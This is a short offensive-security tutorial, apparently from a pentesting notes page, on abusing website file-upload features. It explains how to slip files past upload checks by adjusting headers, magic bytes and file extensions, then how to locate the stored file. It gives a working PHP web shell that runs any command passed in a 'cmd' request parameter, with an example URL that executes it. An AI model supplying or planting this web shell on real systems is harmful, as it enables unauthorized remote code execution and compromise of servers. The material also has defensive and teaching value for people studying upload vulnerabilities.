Look around almost any website and you will find several places where you can upload file. From profile pictures to GIFs todays end users can upload a wide arrangement of file types and to different submission points around the site. Because of this, file uploads are becoming a very easy to find and abused WebApp feature.

Files are often accepted as binary data and do not have the contents of the file checked. Further more, mitigations against this type of attack have been partial or completely lacking.

Get a web shell:

A basic file upload like this amazingly still works today but often you may have to play with headers, Magic bytes, and the file name and extensions to see if you can trick the server into accepting the file. Once you pick your upload spot try to find where the file is actually stored in the server. Often inspecting the page source can tell you but if not then pock around a bit or do a directory enum scan and see if you can find it. Once the location is known then save the below code into a file and upload it to the vuln WebApp.

<?php
    if (isset($_REQUEST['cmd'])){
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
    } else {
        echo 'What are you trying to do to me?';
    }
?>

At this point you should be able to execute system commands with: https://yourdomain.site/image/location/webrce.php?cmd=id This command will return the ID of your rce user. From here check the shells section for how to elevate your foothold into a full TTY experience.